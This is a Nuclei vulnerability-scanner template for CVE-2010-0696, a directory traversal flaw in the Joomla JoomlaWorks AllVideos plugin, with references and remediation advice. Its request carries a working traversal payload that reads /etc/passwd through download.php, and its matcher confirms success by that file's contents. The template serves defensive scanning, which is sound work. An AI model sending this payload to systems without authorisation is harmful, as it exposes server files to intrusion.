my-nuclei-templates/CVE-2010-0696.yaml

32 lines
1.0 KiB
YAML

id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: high
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
- http://secunia.com/advisories/38587
- http://www.joomlaworks.gr/content/view/77/34/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13